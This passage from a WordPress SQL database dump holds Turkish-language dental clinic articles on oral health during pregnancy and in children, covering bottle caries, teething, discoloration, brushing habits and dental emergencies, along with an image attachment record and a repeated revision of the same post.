ve meyveler), C vitamini (narenciye, domates, çilek), D vitamini (et, süt, yumurta, balık) ve kalsiyum (süt ve süt ürünleri, yeşil yapraklı sebzeler)’dan zengin gıdaların yeterince alınması gerekir.\r\n\r\nAyrıca bilinçsiz ilaç kullanımından kaçınılmalıdır. Kullanılan ilaçlar bebeğin diş sağlığının yanı sıra genel vücut gelişimini de olumsuz yönde etkileyebilir. Bebeğin diş sağlığı konusunda bilgili olmak, çocuğunuzun ömür boyu sağlıklı dişlere sahip olmasında ilk basamaktır.\r\n\r\n<strong>Hamilelikte antibiyotik kullanmak bebeğin dişlerini etkiler mi?</strong>\r\n\r\nHamilelik döneminde bilinçsiz ilaç kullanımından kaçınılması gerektiğini belirtmiştik. Zaten hamilelikte kullanılan her türlü ilacın anne adayını takip eden doktorun kontrolünde kullanılması gerektiği unutulmamalıdır. Bu dönemde antibiyotik kullanılması gerekiyorsa ‘tetrasiklinler’ kullanılmamalıdır. Bu grup antibiyotikler ‘tetrasiklin renklenmesi’ denilen geri dönüşümü olmayan renk değişimlerine neden olurlar. Her antibiyotiğin bebeğin dişlerinde lekelenmelere neden olduğu kanısı yanlıştır. Bunun dışındaki antibiyotiklerin, penisilin ve türevlerinin renklenme yaptığına dair bilimsel bir veri yoktur.[/vc_column_text][/vc_column][/vc_row]', 'Hamilelikte Ağız ve Diş Sağlığı', '', 'inherit', 'closed', 'closed', '', '6279-revision-v1', '', '', '2018-07-13 13:47:49', '2018-07-13 10:47:49', '', 6279, 'http://www.ze-dent.com/6279-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6282, 1, '2018-07-13 13:54:05', '2018-07-13 10:54:05', '[vc_row][vc_column][vc_column_text]<strong>Biberon Çürüğü nedir?</strong>\r\n\r\nBebeklerde bazen dişlerin üzerinde sürer sürmez kahverengi lekeler oluştuğu ya da bu dişlerin kırılıp döküldüğü gözlenir. Aslında bu lekeler diş çürükleridir ve dişler de çürük nedeniyle kırılır. Bu kadar erken bir dönemde çürük oluşmasının nedeni ‘biberon çürüğü’ adı verilen çürüklerdir. Bebek beslenmesinde en önemli besin olan anne sütü ya da inek sütü, doğal olarak şeker içerir. Gece yatmadan önce veya uyku sırasında bebek anne sütü ya da biberon emerse süt ağızda birikerek mikropların dişleri çürütmesi için elverişli bir ortam oluşturur. Bu nedenle özellikle gece beslenmesi sonrası dişlerin temizliğine özen gösterilmelidir.\r\n\r\nBiberonun yanı sıra emziklerin bal, pekmez, reçel gibi tatlandırıcılara batırılarak verilmesi biberon çürüklerinin başka bir nedenidir. Bunun yanı sıra, dişler sürdükten sonra bebeğin eline verilen karbohidratlı-şekerli gıdalar da diş çürüklerine neden olur. Çocuğu bu tür gıdaların yerine elma, havuç gibi besin değeri yüksek; diş temizliğine yardımcı gıdalara yönlendirmek gerekir.\r\n\r\nBiberon çürüklerinde erken teşhis sorunun büyümesini önlemek açısından çok önemlidir. Genellikle aileler biberon çürüğünün ilk safhalarında dişlerin çürüdüğünü anlamazlar. Çünkü biberon çürüğünün ilk safhasında dişlerin dişeti sınırında hafif bir beyazlama görülür. Ailelerin dişlerin çürüdüğünün farkına vardığı zaman genellikle kahverengi-siyah renkleşmelerin olduğu zamanlardır ki artık iş işten geçmiş ve dişler çürümüştür. Bu safhadan sonra yapılacak tedavi dolgu veya diş çekimidir.\r\n\r\nBiberon çürüğü görülen dişler tedavi edilmezse ağrı yapar, iltihaplanır ve bebeğin huzursuzlanmasına, beslenme düzeninin bozulmasına neden olur. İltihap alttan gelecek kalıcı dişleri etkileyip şekillerinin bozuk olmasına yol açar. Bu dişler çekilmek zorunda kalırsa da çocukta konuşma problemleri ortaya çıkabilir.\r\n\r\n<strong>Biberon çürüğünden korunmak için neler yapmak gerekir?</strong>\r\n\r\nBebeklerde meydana gelen çürüklerin tedavisi çok güç olduğundan, koruyucu önlemlerin erken dönemde alınması gerekir. Yapılabilecekler şunlardır:\r\n<ul>\r\n 	<li>Bebeğinizin gece ağzında biberonla uyuma alışkanlığını önleyin. Beslendikten sonra uyutmaya çalışın.</li>\r\n 	<li>Biberondaki süte şeker, bal pekmez gibi tatlandırıcılar ilave etmeyin.</li>\r\n 	<li>Bebek beslendikten sonra mutlaka su içirin.</li>\r\n 	<li>İlk dişlerin sürmeye başlamasıyla gece ve sabah beslenmeleri sonrası temiz, ıslak bir tülbent ile dişlerini silerek temizleyin.</li>\r\n</ul>\r\n<strong>Diş çürükleri bulaşıcı mıdır?</strong>\r\n\r\nDiş hekimliğinde üzerinde uzlaşma sağlanan son konulardan birisi; diş çürüklerinin bulaşıcı bir hastalık olduğudur. Diş çürüklerinden birçok bakteri sorumludur bunların arasından en önemli bakteri ise ‘Streptococcus Mutans’ grubu bakterilerdir.\r\n\r\nBebekler ağızlarında streptokok bakterileri ile doğmazlar. Bebeklere bakterilerin ilk bulaşma yolu genellikle anne vasıtası ile olmaktadır. Annenin tükürüğünde doğal olarak bulunan streptokoklar, ilk önce öpme ile daha sonra ise yemek yediği kaşıkla önce annenin tadına bakması, biberon içerisindeki süt veya mamanın sıcaklığını kontrol etmesiyle bulaşabilir.\r\n\r\nPeki bu durumda annelerin bebeklerini olası bakteri transferinden koruması için yapması gereken şeyler nelerdir? En önemli ve ilk yapılması gereken işlem, annenin ağız ve diş bakımının mükemmel olmasıdır. Bunun anlamı her gün düzenli olarak dişlerin fırçalanması ve diş ipi kullanılmasıdır. İkinci basamak ise düzenli diş hekimi kontrolleri ile annenin ağzında çürük diş ve dişeti hastalığı riskinin ortadan kaldırılmasıdır. Bu sorunu sadece anne ile sınırlamak pek doğru olmayacaktır. Bebekle yakın temas kuran diğer kişiler için de tüm önlemler alınmalıdır.\r\n\r\n<strong>Diğer dikkat edilmesi gereken hususlar ise;</strong>\r\n<ul>\r\n 	<li>Çocuğunuzla asla aynı diş fırçasını kullanmayın.</li>\r\n 	<li>Mümkünse yemeklerde çocuğunuz için ayrı bir kaşık kullanın, yemeğin kontrolünü başka bir kaşıkla yapın.</li>\r\n 	<li>Bebeğinizin yemeğini ağzınızda soğutmayın.</li>\r\n 	<li>Bebeğinizin biberonuna veya emziğine ağzınızı sürmeyin. (Kimi anneler bunu temizleme amacıyla yapar.)</li>\r\n 	<li>Sizin dışınızda çocuğunuza temas eden kişilerde uçuk, diş eti hastalığı veya ağız-diş sağlığı ile ilgili problemlerin olmamasına özen gösterin.</li>\r\n 	<li>Tüm bu önlemleri aldığınızda ise onu bol bol öpün…</li>\r\n</ul>\r\n<strong>Bebeğin diş çıkarma belirtileri nelerdir?</strong>\r\n\r\nDiş çıkarmadan bir-iki gün önce huysuzluk, iştahsızlık, diş etlerinde kaşıntı ve salya miktarında artış olabilir. Dişin çıkacağı bölgede diş eti kabarmıştır. Bütün bu şikayetler dişlerin çıkması ile kaybolur. Bu şikayetleri giderecek bir ilaç yoktur. Ancak yemeklerden önce uygulanmak üzere eczanelerde satılan pomatlardan yararlanılabilir.\r\n\r\nEskiden diş sürme çağına gelen çocuğun her şikayeti diş çıkarmaya bağlanırdı. Her ne kadar diş sürmesi genel sağlık üzerinde bazı etkiler gösteriyorsa da havale, ishal, bronşit gibi hastalıkların nedeni artık diş sürmesine bağlanmıyor. Çocuğun genel durumundaki bozukluktan diş sürmesini sorumlu tutabilmek için başka bütün nedenlerin araştırılması gerekir.\r\n\r\n<strong>Süt dişleri ve kalıcı dişlerin çıkış takvimi nasıldır?</strong>\r\n\r\nGenel olarak bebeklerde ilk dişler 6 aylıkken sürmeye başlar. 24 -30 aylar arasında süt dişlerinin sürmesi tamamlanır. Süt dişleri tamamlanmış bir çocukta her bir çenede 10 adet olmak üzere toplam 20 adet diş bulunur. Bazense bebekler dişli doğabilir ya da doğumdan hemen sonra diş sürebilir. Bu dişler genellikle sallanan dişlerdir, bebek yutabilir ya da nefes borusuna kaçabilir düşüncesiyle çekimi gerekir. Yaratacağı bir diğer problem de beslenme sırasında annenin göğüs ucunun tahriş olmasıdır. Böyle bir durumda diş hekiminin müdahalesi gerekir.\r\n\r\nBebeğin kendisine bağlı birtakım faktörlerin etkisiyle diş çıkarmada gecikmeler de yaşanabilmektedir. Bu durum 1 yaşına kadar normal kabul edilir. Ancak bebek 1 yaşına bastığı halde ağzında diş yoksa nedeninin araştırılması için bir dişhekimine götürülmesi gerekir.\r\n\r\n6 yaşında süt azıların arkasından ‘6 yaş dişleri’ dediğimiz daimi dişler sürmeye başlar. Bu dişler, alt ve üst çenede sağlı sollu ikişer tane olmak üzere toplam dört tanedir. Genellikle süt dişi zannedildikleri için çürüdüklerinde tedavi edilmeyip çekilirler. Halbuki diş sistemi için çok önemli olan bu dişlerin çekilmesi, dişlerde tedavisi çok zor olan çapraşıklıklara neden olur. Ömür boyu ağızda kalan ve çiğnemenin merkezi olan bu ilk kalıcı dişleri korumak için ‘fissür örtücü’ denilen dişi çürüğe karşı koruyan uygulamalar yapılmalıdır.\r\n\r\nSüt dişleri daimi dişlerin çıkacakları yeri korurlar. Süt dişleri erken zamanda çekilmek zorunda kalınırsa, bu alanı korunmak amacıyla ‘yer tutucular’ kullanılmalıdır. Kalan dişlerin durumu ve çocukların uyum durumuna bağlı olarak hareketli (takmalı çıkarmalı) veya sabit (yapışmalı) olarak hazırlanabilirler.\r\n\r\n7-11 yaşlar arasında süt dişleri sallanır ve alttan gelen kalıcı dişler onların yerini alır.\r\n\r\n12 yaşında 6 yaş dişlerinin arkasından ikinci daimi büyük azılar çıkar. 6 yaş dişleri gibi bunlar da bir süt dişinin yerine sürmeyen dişlerdendir.\r\n\r\n<strong>Diş renkleşmelerinin sebebi nedir?</strong>\r\n\r\nTıpkı çocuklarda veya erişkinlerde olduğu gibi bebeklerde de henüz yeni sürmüş süt dişlerinde renkleşmeler görülebilir. Bunun en önemli sebebi ‘bakteri plağı’dır. Eğer bebeğinizin dişlerinde sarımtırak veya portakal rengi tarzında bir görüntü oluşmaya başlarsa, bu bakteri plağının bebeğinizin dişlerine yapıştığının bir işaretidir.\r\n\r\nBakteri plağı oldukça yapışkan ve içerisinde adından da anlaşılacağı üzere bakteri kolonileri ihtiva eden kompleks bir oluşumdur. Bebeklerde ve çocuklarda diş fırçalamasının ihmal edildiği durumlarda 24 saat içerisinde oluşur ve hızlı bir şekilde olgunlaşarak dişler üzerinde kalıcı hasarlar bırakabilir.\r\n\r\nBakteri plağı, bebeklerde ve çocuklarda diş çürükleri ile dişeti problemlerinden birinci derece sorumlu bir oluşumdur. Böyle bir görüntüyü bebeğinizin ağzında gördüğünüz anda mutlaka bebekler için üretilmiş olan yumuşak kıllı bir fırça ile dişlerini temizleyin. Eğer bakteri plağını dişlerin üzerinden uzaklaştırmakta zorlanıyorsanız o zaman çok az (leblebi tanesinin yarısı kadar) çocuk diş macunu kullanarak plağı kaldırmaya çalışınız. Tüm bu çabalara rağmen dişler üzerindeki lekeler uzaklaşmıyorsa mutlaka pedodontistinize/çocuk diş hekiminize başvurunuz.\r\n\r\nUnutmayın ki; diş çürüklerinin bebeklerde ilk görüntüsü de beyaz/sarımtırak bir karakter sergilemektedir.\r\n\r\nEğer bebeğinizin dişlerinde siyah renkleşmeler gözlemlerseniz; bu siyah lekeleri hemen diş çürükleri olarak değerlendirmeyin. Genellikle bebeğiniz için kullanmış olduğunuz demir preparatları veya multivitamin damlaları dişlerin üzerinde geçici siyah lekeler bırakabilir. Dişlerin düzenli diş fırçalaması ile bu lekelerin hiç oluşmamasını veya çok az oluşmasını sağlayabilirsiniz.\r\n\r\nBu arada yeri gelmişken birçok anne-babanın belirttiği “bebeğimizin dişleri kullandığı antibiyotikten sarardı” yakınmalarını da biraz aydınlatalım. Günümüzde bebekler/çocuklar için kullanılan antibiyotikler birçok araştırma ve geliştirme aşamalarından sonra insanların/hekimlerin kullanımına sunuluyor. Şu anda çocuk doktorunuzun yazacağı hiçbir antibiyotik dişleri renkleştirmez. Fakat bebeğinizin dişlerini hasta olduğu dönemde fırçalamazsanız yediği/içtiği besinler gibi antibiyotik de onun dişlerine bakteri plağı olarak yapışır ve geçici (dişler fırçalanana kadar) renkleşmeler yapabilir.\r\n\r\nSüt dişlerinde görülen bir diğer renkleşme de travmalara bağlı görülenlerdir. Bebeğiniz özellikle yeni yürümeye başladığında biraz merak biraz da kaza sonucu mutlaka düşerler. Bazen bu düşmeler onları ağlatmayacak kadar basit olabilirken, bazen de ciddi sorunlar çıkarabilir. Eğer dişlerinin üzerine düşerse; düşmenin şiddetine bağlı olarak dişler canlılıklarını kaybedebilir ve dişlerin rengi mat grimsi bir hal alabilir. Bu gibi durumlarda mutlaka çocuk diş hekiminize derhal başvurunuz.\r\n\r\nŞu ana kadar bahsedilen tüm renkleşmeler dişlerin temizlenmesi ile uzaklaştırılabilen geçici renklenmelerdir. Bunlara ek olarak süt dişlerinde ve daimi dişlerde fazla fluor tüketilmesine bağlı ve hamilelik döneminde veya doğumdan sonraki ilk aylarda yüksek ateşe bağlı enfeksiyonlar da diş renkleşmelerine sebep olabilir. Bu gibi durumlarda detaylı bilgiyi pedodontistinizden alabilirsiniz.\r\n\r\n<strong>Çocuklardaki dişhekimi korkusunu aşmak için neler yapılmalıdır?</strong>\r\n\r\nÇocuğunuza diş tedavisinin korkulacak bir yanı olmadığını anlatırsanız, kolaylıkla diş hekimine götürebilirsiniz. Ancak genelde ebeveynler dişçiye gitmeyi bir korku unsuruna dönüştürür. Bu nedenle:\r\n<ul>\r\n 	<li>Çocuğun diş hekimine götürülmesi bir ceza anlamı taşımamalıdır. Tam aksine severek gideceği bir ortam yaratılmalıdır.</li>\r\n 	<li>Dikkat edilmesi gereken başka bir konu da, diş hekimine gitme ile çocuğun maruz kalacağı ağrı olayı arasında bir çağrışım uyandırmamaktır. Çocuğa “Dişin hiç ağrımayacak”, “Doktor iğne yapmayacak” diyerek onu yanıltmak ilerideki tedavileri güçleştirir.</li>\r\n 	<li>Diş hekimi ile çocuğun iyi bir diyalog kurması, çocuğun korkusunu yenmesine yardımcı bir faktördür. Bunun için diş hekiminin sorduğu sorulara çocuğun kendisinin yanıt vermesine izin verilmelidir.</li>\r\n</ul>\r\n<strong>Süt dişleri tedavi edilmeli midir?</strong>\r\n\r\nSüt dişleri normal dişlere oranla daha çok organik madde içerirler, bu nedenle kolay ve hızlı çürümeye yatkınlardır. Süt dişleri de tıpkı kalıcı dişlerde olduğu gibi tedavi edilmelidir. Ayrıca değişecek düşüncesiyle bu dişlerin çekilmesi pek çok problemlere neden olur. Süt dişlerinin önemini şöyle açıklayabiliriz;\r\n<ul>\r\n 	<li>Süt dişlerinin beslenmede önemlidir. Çürük dişleri olan çocuklar dişleri ağrıdığı için doğru dürüst yemek yiyemezler. Aynı şekilde dişleri çekilen çocuklar da yemek yiyemedikleri için büyüyüp gelişemezler.</li>\r\n 	<li>Süt dişleri çene gelişimi için de gereklidir. Çürük ya da dişeti problemi nedeniyle dişleri çekilen çocuklarda çeneler çöker ve yaşlı bir görünüm alır.</li>\r\n 	<li>Dişler konuşmak için gereklidir. Özellikle konuşmanın öğrenildiği dönemde ön süt dişlerinin eksik olması f, v, s, z, t harflerinin bir alışkanlık haline gelerek ömür boyu yanlış telaffuz edilmesine neden olacaktır.</li>\r\n 	<li>Her çocuk gülmeyi sever. Güzel bir gülümseme için ise sağlıklı dişlere ihtiyaç vardır.</li>\r\n 	<li>Güzel görünmek büyük küçük her insanın en doğal isteğidir. Çürük ya da eksik dişleri olan çocuklar çirkin göründüklerini düşünerek psikolojik rahatsızlık duyarlar.</li>\r\n 	<li>Süt dişlerinin bir diğer görevi de alttan gelen daimi dişlerin yerini korumaktır. Bir süt dişi zamanından önce çekilirse yandaki dişler bu boşluğa doğru kayar. Alttan gelecek kalıcı dişe yer kalmaz. Bu diş diğerlerini sıkıştırır, sonuç olarak çapraşıklıklar meydana gelir.</li>\r\n</ul>\r\n<strong>Çocuklarda ağız bakımı nasıl olmalıdır?</strong>\r\n\r\nİlk dişler ağızda görünür görünmez, temizlenmeye başlanmalıdır. Temiz bir tülbent ya da gazlı bez kullanılarak; sabah kahvaltı sonrası ve gece yatmadan önce dişlerin silinerek temizlenmesi gerekir. Diş fırçası kullanımına bebeğin arka dişlerinin çıkmasından sonra başlanabilir. İlk fırçalama girişimleri oldukça zor, hatta başarısız olabilir fakat zamanla bu bebeğinizin de hoşuna giden bir alışkanlık halini alacaktır. Özellikle süt dişlerinin yeni sürmeye başladığı zamanlarda fırçalamanın düzenli olarak yapılması diş etlerine masaj etkisi yaparak bebeğinizin rahatlamasına ve diş sürme ağrılarının azalmasına sebep olacaktır.\r\n\r\nOkul öncesi çocuklarda önemli olan, çocuğa diş fırçalama alışkanlığını kazandırmaktır. Sabah kahvaltı öncesi ve gece yatmadan önce, sadece üçer dakikalık etkili bir fırçalama işlemi yeterlidir. Ancak çocuklar diş fırçalarken çoğu zaman dişlerin görünen ya da kolay ulaşılan yüzlerini fırçalar. Oysaki mikroplar, dişlerin ara yüzleri ya da çiğneyici yüzeylerinde daha kolay birikir. Bu nedenle fırçalamadan sonra ebeveyn kontrolü şarttır.\r\n\r\nÇocuğun ağız büyüklüğüne uygun, yumuşak ve naylon kıllardan üretilmiş diş fırçaları kullanılmalıdır. Sert fırçalar dişleri aşındıracağı için kullanımı uygun değildir. Fırçalar, ortalama 6 ay sonra mutlaka değiştirilmelidir.\r\n\r\nAilelerin bir diğer sıkça sordukları soru ise diş fırçalama esnasında diş macunu kullanımı ile ilgili kaygılardır. Genellikle bebekler ve çocuklar diş macununun tadını çok severler ve fırçalama esnasında diş macununu yutarlar. Bu sebepten dolayı 2,5-3 yaşından daha küçük çocuklarda diş fırçalanmasında diş macunu kullanılmaması daha doğru bir yaklaşım olacaktır. Fakat bu konuda tüm çocuklar adına bir genelleme yapmak doğru olmayacaktır. Bu sebepten dolayı bebeğinizin dişlerini fırçalarken macun kullanıp kullanılmayacağını pedodontistinize danışarak karar vermeniz yapılacak en doğru işlemdir. Unutmayın ki; çocukların fazlaca yutabilecekleri fluorlu diş macunu onların hem dişleri hem de genel vücut sağlığı açısından sorun yaratabilir.\r\n\r\n<strong>Çocuklara diş fırçalama alışkanlığı nasıl kazandırılır?</strong>\r\n<ul>\r\n 	<li>Dişlerini fırçalarken ayrı bir diş fırçası ile siz de kendi dişlerinizi fırçalayın.</li>\r\n 	<li>Ona birkaç tane diş fırçası alın. Bu fırçalar farklı renkte ve değişik çizgi roman kahramanlarının olduğu fırçalar olsun. Her seferinde başka bir fırça seçmesini sağlayın. Bu seçim onun diş fırçalama isteğini ve motivasyonunu artıracaktır.</li>\r\n 	<li>Önce kendisinin dişlerini fırçalamasına izin verin sonra siz onun, o da sizin dişlerinizi fırçalasın.</li>\r\n 	<li>Evde mutlaka diş fırçalama panosu oluşturun ve her fırçalamadan sonra pano üzerinde işaretleme yapın.</li>\r\n 	<li>Banyoya bir kum saati yerleştirin ve her fırçalamada kum saatini ters çevirerek zaman tutun. Yaklaşık 2 dakikalık diş fırçalama yeterli olacaktır.</li>\r\n 	<li>Unutmayın ki bebeğiniz veya çocuğunuzun diş çürüğü hakkında hiçbir bilgisi yoktur. Ona yapışkan özelliği olan şeker, çikolata veya bisküvi yedirin ve aynada dişlerin üzerine nasıl yapıştığını gösterin. Daha sonra dişlerini fırçalatın ve dişlerinin ne kadar güzel, temiz ve beyaz olduğunu ona aynada gösterin.</li>\r\n</ul>\r\nUnutulmamalıdır ki düzenli diş fırçalama çocuğunuzun ileride oluşabilecek diş problemlerinin önlenmesinde büyük rol oynayacaktır.\r\n\r\n<strong>Çocuğun beslenme şekli onun diş sağlığını etkiler mi?</strong>\r\n\r\nSağlıklı beslenme, çocuğun büyümesi ve gelişimi için gerekli tüm gıdaların dengeli bir şekilde alınması demektir. Yani sebze, meyve, süt, et, balık ve yumurta gibi ana besin gruplarını düzenli bir şekilde tüketmesi gerekmektedir. Bu onun genel vücut gelişimini etkilediği gibi onun diş/dişeti gelişiminde de çok önemli rol oynamaktadır. Örneğin karbonhidrattan zengin beslenme düzenine sahip bir çocuk diş çürüklerinin oluşumu açısından risk altındadır. Bu nedenle;\r\n<ul>\r\n 	<li>Alışveriş yaparken şeker ve nişasta içeren gıdalar konusunda daha seçici davranarak bu gıdaların tüketimini azaltmaya çalışın. Bu gıdaları sadece ana öğünlerde tüketmesine izin verin.</li>\r\n 	<li>Çocuğunuzun beslenme zamanlarını düzenleyin ve her öğünde besleyici değeri yüksek gıdalarla beslenmesini sağlayın.</li>\r\n 	<li>Bebeğinizin uyku sırasında biberonla uyumasına izin vermeyin.</li>\r\n 	<li>Eğer çocuğunuz sakız çiğnemeyi seviyorsa şeker içermeyen sakızları çiğnemesini sağlayın.</li>\r\n</ul>\r\n<strong>Acil durumlarda nasıl davranılmalıdır?</strong>\r\n\r\nÇocuklarda oluşabilmesi muhtemel acil diş sorunlarını iki grupta toplayabiliriz:\r\n<ul>\r\n 	<li>Çarpma/düşme sonucu meydana gelen yaralanmalar</li>\r\n 	<li>Diş ağrısı</li>\r\n</ul>\r\n<strong>Çarpma/düşme sonucu meydana gelen yaralanmalar</strong>\r\nPek çoğumuzun bildiği gibi çocuklar yürümeyi düşe kalka öğrenirler. Bu düşmeler genellikle hasarsız atlatılabildiği gibi, bazen istenmeyen durumlarla da karşılaşılabilir. Eğer çocuk süt dişlenme dönemindeyse (0-6 yaş) çarpma ve düşme nedeniyle bazen ön süt dişleri çene kemiği içerisine tamamen veya kısmen gömülebilir. Genellikle 3-9 ay içerisinde bu dişler tekrar eski yerlerinden sürerler. Ancak çarpma esnasında bu dişlerin altındaki daimi dişlerin zedelenme ihtimalinin yanı sıra, çenede kırıklar da olabileceğinden en kısa sürede bir pedodontist/diş hekimine başvurulmalıdır.\r\n\r\nDiş hekimine gidene kadar geçen süre içinde ılık su ile ağzın çalkalanması ve yaralanma yerine soğuk kompres yapılması sonra oluşabilecek şişmeleri önleyecektir. Yaralanma sonucunda yerlerinden çıkan daimi dişler tekrar yerlerine oturtulduklarında, iyileşme şansı çok yüksektir. Dişin yuvasından tamamen çıktığı durumlarda, diş düştüğü yerden kök ucuna değmeden tutularak, serum fizyolojik, süt veya bunların bulunamadığı durumlarda su içine konularak vakit geçirmeden diş hekimine gidilmelidir. Unutulmamalıdır ki; yapılacak erken müdahaleler ileride oluşabilecek ciddi sorunları önlemektedir.\r\n\r\n<strong>Diş ağrısı</strong>\r\nEn sık karşılaşılan durumlardan biri de genellikle geceleri meydana gelen ani diş ağrılarıdır. Bu gibi durumlarda çocuğu rahat ettirmek için önce ağzını su ile çalkalayın. Daha sonra dişlerini diş fırçası ve diş ipi ile temizleyin. Bazen sadece bu iki metot sayesinde; dişlerin arasına sıkışmış gıda artıkları çıkarılarak çocuğunuzun diş ağrısını kolayca geçirebilirsiniz. Eğer bu iki işlem yapıldığı halde ağrı geçmiyorsa; dişlerde ‘pulpitis ağrısı’ dediğimiz ağrılı durum başlamış demektir. Mevcut ağrıyı hafifletmek için ağrıyan dişin olduğu bölgeye soğuk su veya buz tatbiki yapın. Soğuk tatbiki ağrının azalmasına sebep olacaktır. Kesinlikle ağrıyan dişin üzerine SICAK SU veya ASPİRİN uygulamayın. Tüm bu işlemlere rağmen ağrısı kesilmiyorsa diş hekiminizin önereceği ağrı kesici bir şurup veya tablet kullanılması ağrının azalmasına yol açacaktır.\r\n\r\nYukarıda bahsedilen tüm acil durumlarda yapmanız gereken ilk iş pedodontist/diş hekiminize derhal ulaşmak olacaktır. Bu sebepten dolayı doktorunuzun telefon numaralarını bu gibi acil durumlarda kullanılmak üzere mutlaka kolay erişebileceğiniz bir yere kaydedin.[/vc_column_text][/vc_column][/vc_row]', 'Çocuklarda Ağız ve Diş Sağlığı', '', 'publish', 'closed', 'closed', '', 'cocuklarda-agiz-ve-dis-sagligi', '', '', '2018-07-13 13:54:05', '2018-07-13 10:54:05', '', 0, 'http://www.ze-dent.com/?p=6282', 0, 'post', '', 0),
(6283, 1, '2018-07-13 13:50:15', '2018-07-13 10:50:15', '', 'cocuklarda-dis-bakimi', '', 'inherit', 'closed', 'closed', '', 'cocuklarda-dis-bakimi', '', '', '2018-07-13 13:50:15', '2018-07-13 10:50:15', '', 6282, 'http://www.ze-dent.com/wp-content/uploads/2018/07/cocuklarda-dis-bakimi.jpg', 0, 'attachment', 'image/jpeg', 0),
(6284, 1, '2018-07-13 13:54:05', '2018-07-13 10:54:05', '[vc_row][vc_column][vc_column_text]<strong>Biberon Çürüğü nedir?</strong>\r\n\r\nBebeklerde bazen dişlerin üzerinde sürer sürmez kahverengi lekeler oluştuğu ya da bu dişlerin kırılıp döküldüğü gözlenir. Aslında bu lekeler diş çürükleridir ve dişler de çürük nedeniyle kırılır. Bu kadar erken bir dönemde çürük oluşmasının nedeni ‘biberon çürüğü’ adı verilen çürüklerdir. Bebek beslenmesinde en önemli besin olan anne sütü ya da inek sütü, doğal olarak şeker içerir. Gece yatmadan önce veya uyku sırasında bebek anne sütü ya da biberon emerse süt ağızda birikerek mikropların dişleri çürütmesi için elverişli bir ortam oluşturur. Bu nedenle özellikle gece beslenmesi sonrası dişlerin temizliğine özen gösterilmelidir.\r\n\r\nBiberonun yanı sıra emziklerin bal, pekmez, reçel gibi tatlandırıcılara batırılarak verilmesi biberon çürüklerinin başka bir nedenidir. Bunun yanı sıra, dişler sürdükten sonra bebeğin eline verilen karbohidratlı-şekerli gıdalar da diş çürüklerine neden olur. Çocuğu bu tür gıdaların yerine elma, havuç gibi besin değeri yüksek; diş temizliğine yardımcı gıdalara yönlendirmek gerekir.\r\n\r\nBiberon çürüklerinde erken teşhis sorunun büyümesini önlemek açısından çok önemlidir. Genellikle aileler biberon çürüğünün ilk safhalarında dişlerin çürüdüğünü anlamazlar. Çünkü biberon çürüğünün ilk safhasında dişlerin dişeti sınırında hafif bir beyazlama görülür. Ailelerin dişlerin çürüdüğünün farkına vardığı zaman genellikle kahverengi-siyah renkleşmelerin olduğu zamanlardır ki artık iş işten geçmiş ve dişler çürümüştür. Bu safhadan sonra yapılacak tedavi dolgu veya diş çekimidir.\r\n\r\nBiberon çürüğü görülen dişler tedavi edilmezse ağrı yapar, iltihaplanır ve bebeğin huzursuzlanmasına, beslenme düzeninin bozulmasına neden olur. İltihap alttan gelecek kalıcı dişleri etkileyip şekillerinin bozuk olmasına yol açar. Bu dişler çekilmek zorunda kalırsa da çocukta konuşma problemleri ortaya çıkabilir.\r\n\r\n<strong>Biberon çürüğünden korunmak için neler yapmak gerekir?</strong>\r\n\r\nBebeklerde meydana gelen çürüklerin tedavisi çok güç olduğundan, koruyucu önlemlerin erken dönemde alınması gerekir. Yapılabilecekler şunlardır:\r\n<ul>\r\n 	<li>Bebeğinizin gece ağzında biberonla uyuma alışkanlığını önleyin. Beslendikten sonra uyutmaya çalışın.</li>\r\n 	<li>Biberondaki süte şeker, bal pekmez gibi tatlandırıcılar ilave etmeyin.</li>\r\n 	<li>Bebek beslendikten sonra mutlaka su içirin.</li>\r\n 	<li>İlk dişlerin sürmeye başlamasıyla gece ve sabah beslenmeleri sonrası temiz, ıslak bir tülbent ile dişlerini silerek temizleyin.</li>\r\n</ul>\r\n<strong>Diş çürükleri bulaşıcı mıdır?</strong>\r\n\r\nDiş hekimliğinde üzerinde uzlaşma sağlanan son konulardan birisi; diş çürüklerinin bulaşıcı bir hastalık olduğudur. Diş çürüklerinden birçok bakteri sorumludur bunların arasından en önemli bakteri ise ‘Streptococcus Mutans’ grubu bakterilerdir.\r\n\r\nBebekler ağızlarında streptokok bakterileri ile doğmazlar. Bebeklere bakterilerin ilk bulaşma yolu genellikle anne vasıtası ile olmaktadır. Annenin tükürüğünde doğal olarak bulunan streptokoklar, ilk önce öpme ile daha sonra ise yemek yediği kaşıkla önce annenin tadına bakması, biberon içerisindeki süt veya mamanın sıcaklığını kontrol etmesiyle bulaşabilir.\r\n\r\nPeki bu durumda annelerin bebeklerini olası bakteri transferinden koruması için yapması gereken şeyler nelerdir? En önemli ve ilk yapılması gereken işlem, annenin ağız ve diş bakımının mükemmel olmasıdır. Bunun anlamı her gün düzenli olarak dişlerin fırçalanması ve diş ipi kullanılmasıdır. İkinci basamak ise düzenli diş hekimi kontrolleri ile annenin ağzında çürük diş ve dişeti hastalığı riskinin ortadan kaldırılmasıdır. Bu sorunu sadece anne ile sınırlamak pek doğru olmayacaktır. Bebekle yakın temas kuran diğer kişiler için de tüm önlemler alınmalıdır.\r\n\r\n<strong>Diğer dikkat edilmesi gereken hususlar ise;</strong>\r\n<ul>\r\n 	<li>Çocuğunuzla asla aynı diş fırçasını kullanmayın.</li>\r\n 	<li>Mümkünse yemeklerde çocuğunuz için ayrı bir kaşık kullanın, yemeğin kontrolünü başka bir kaşıkla yapın.</li>\r\n 	<li>Bebeğinizin yemeğini ağzınızda soğutmayın.</li>\r\n 	<li>Bebeğinizin biberonuna veya emziğine ağzınızı sürmeyin. (Kimi anneler bunu temizleme amacıyla yapar.)</li>\r\n 	<li>Sizin dışınızda çocuğunuza temas eden kişilerde uçuk, diş eti hastalığı veya ağız-diş sağlığı ile ilgili problemlerin olmamasına özen gösterin.</li>\r\n 	<li>Tüm bu önlemleri aldığınızda ise onu bol bol öpün…</li>\r\n</ul>\r\n<strong>Bebeğin diş çıkarma belirtileri nelerdir?</strong>\r\n\r\nDiş çıkarmadan bir-iki gün önce huysuzluk, iştahsızlık, diş etlerinde kaşıntı ve salya miktarında artış olabilir. 